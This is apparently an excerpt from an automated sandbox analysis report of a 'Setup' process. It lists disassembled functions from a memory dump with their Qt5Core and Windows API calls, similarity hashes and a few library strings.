                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979892
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798A3
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798B0
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19798E8
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA19798FF
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197991F
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979930
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980700
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198070E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198071C
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198072A
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980738
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980746
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980754
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198078E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980798
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807A2
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807AC
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807B6
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA198036B
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980380
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$String@@$V0@@$?append@Type@@$?registerConverterDateFunction@Time@@Type@$BasicFlag@Flags@NormalizedObject@@@Timer@@TypeType@@@@$?ends?has?normalized?reserve@?typeAbstractName@Object@@Private@@RegisteredWith@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 810054842-0
                                                                                                                                                              • Opcode ID: c5c91c101c2bc8e72f5fe1a14fbf9265536351711434db7f5871df5c4d29c3fb
                                                                                                                                                              • Instruction ID: 6b495daf610578f4b305e72dbac5c78561ce9192a66fdc12d7877a92ee92b91c
                                                                                                                                                              • Opcode Fuzzy Hash: c5c91c101c2bc8e72f5fe1a14fbf9265536351711434db7f5871df5c4d29c3fb
                                                                                                                                                              • Instruction Fuzzy Hash: 191133A261AA1291EB419F31E8540696331FF94F98F444031DE1E47669EF3CD946CF40
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                              • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFBA3
                                                                                                                                                              • swprintf_s.MSPDB140-MSVCRT ref: 00007FFBA19FFBF1
                                                                                                                                                              • ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Local$?fromAllocArray@CharFormatFreeMessageString@@swprintf_s
                                                                                                                                                              • String ID: IDispatch error #%d$Unknown error 0x%0lX
                                                                                                                                                              • API String ID: 3202307814-2934499512
                                                                                                                                                              • Opcode ID: 3719f0fcea7e990346dbfe32eb5e58b5ac441a2d680247cca50caeac6c2d4b6a
                                                                                                                                                              • Instruction ID: 72f5b3c3b69db0c13d1b02b00febf56ea03c23c6eb397bed5417acc224a7aacc
                                                                                                                                                              • Opcode Fuzzy Hash: 3719f0fcea7e990346dbfe32eb5e58b5ac441a2d680247cca50caeac6c2d4b6a
                                                                                                                                                              • Instruction Fuzzy Hash: 4431A2A2A0AB4581EB958B65E05017977A0FB84FA4F148236DF5D077E4DF7CD84ACB00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E13BF
                                                                                                                                                              • ??0QRecursiveMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E13DB
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19E140A
                                                                                                                                                              • ??0QFactoryLoader@@QEAA@PEBDAEBVQString@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA19E1426
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19E1431
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19DEB23
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB57
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB64
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19E43C3
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E43F7
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E4404
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$Object@@String@@$?normalized?registerFlag@Flags@NormalizedObject@@@TypeType@@Type@@@@$CaseFactoryLatin1Loader@@Mutex@@Qt@@@RecursiveSensitivity@String@@@V0@@
                                                                                                                                                              • String ID: /bearer$org.qt-project.Qt.QBearerEngineFactoryInterface
                                                                                                                                                              • API String ID: 4122440066-2899753972
                                                                                                                                                              • Opcode ID: a4e2aca08986e9630b560e7f54a0b5b2bb57e9cdd40c8cff475ea268ecd24ca8
                                                                                                                                                              • Instruction ID: 93f3021207eb1516bf1b4ddcee69706d9c7210bb4908e4206cfa5a02001fdc3a
                                                                                                                                                              • Opcode Fuzzy Hash: a4e2aca08986e9630b560e7f54a0b5b2bb57e9cdd40c8cff475ea268ecd24ca8
                                                                                                                                                              • Instruction Fuzzy Hash: 7121F97660AB4696EB51CB25F5402A973B0FB48768F400132DE9D43B68EF3CE1A5CF40
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$?const?convert@?dispose@?userData@Data@1@@Data@@Int@ListType@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2974530379-0
                                                                                                                                                              • Opcode ID: b95fcf3fc4511ac67c157aceafaf326a028bcf21522c73145ae1eb59f1927dd6
                                                                                                                                                              • Instruction ID: 117cedc17accc1cd4a48678c341e5e06fa93079b9006862b92ef2f5a88071051
                                                                                                                                                              • Opcode Fuzzy Hash: b95fcf3fc4511ac67c157aceafaf326a028bcf21522c73145ae1eb59f1927dd6
                                                                                                                                                              • Instruction Fuzzy Hash: 8E818572A1AA4286EBA28F35D55027963A1FF44B98F5C4136DE5E477A4DE3CE442CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987043
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846A6
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QUrl@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846B0
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19870C6
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987119
                                                                                                                                                              • ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987136
                                                                                                                                                              • ??4QVariant@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987151
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19871EF
                                                                                                                                                              • ?freeNode@QHashData@@QEAAXPEAX@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19871FB
                                                                                                                                                              • ?hasShrunk@QHashData@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987212
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197DA08
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197DA3B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                               • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              APIs
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45B0F
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A319A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A319CD
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A319E4
                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFBA1A437DE), ref: 00007FFBA1A45B3B
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45BCC
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45C5E
                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFBA1A437DE), ref: 00007FFBA1A45CBC
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45CF3
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45CFC
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45D0E
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6A0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6C0
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6D8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D777
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D785
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D807
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D815
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D820
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1993E70), ref: 00007FFBA1992F3C
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?constEnd@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F51
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F5D
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?parseIp4@QIPAddressUtils@@YA_NAEAIPEBVQChar@@1@Z.QT5CORE ref: 00007FFBA1992F6E
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?constEnd@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F87
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F93
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?parseIp6@QIPAddressUtils@@YAPEBVQChar@@AEAY0BA@EPEBV2@1@Z.QT5CORE ref: 00007FFBA1992FA4
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993E87
                                                                                                                                                              • ??0QStringRef@@QEAA@XZ.QT5CORE ref: 00007FFBA1993E91
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F35
                                                                                                                                                              • ??0QStringRef@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F43
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993F7E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993F88
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993FE2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993FEC
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ?size@QStringRef@@QEBAHXZ.QT5CORE ref: 00007FFBA19926CE
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ?size@QStringRef@@QEBAHXZ.QT5CORE ref: 00007FFBA19926DC
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ??M@YA_NAEBVQStringRef@@0@Z.QT5CORE ref: 00007FFBA19926EE
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA19942C4
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA19942DC
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??8@YA_NAEBVQString@@0@Z.QT5CORE ref: 00007FFBA19942E8
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE ref: 00007FFBA19942FA
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1994318
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1994323
                                                                                                                                                                • Part of subcall function 00007FFBA1994220: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1994266
                                                                                                                                                                • Part of subcall function 00007FFBA1994220: ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA1994270
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E76
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E7F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E8B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E97
                                                                                                                                                              • ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4EFA
                                                                                                                                                              • ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4F2A
                                                                                                                                                              • ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4F7D
                                                                                                                                                              • ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4FAC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22890
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228A4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228B0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228C2
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22901
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A2290D
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22986
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A2298F
                                                                                                                                                              APIs
                                                                                                                                                              • ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA19805EA
                                                                                                                                                              • ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980602
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980617
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA198062F
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980647
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980668
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980687
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980697
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E63
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E7A
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E89
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E9A
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EB0
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EEF
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EF8
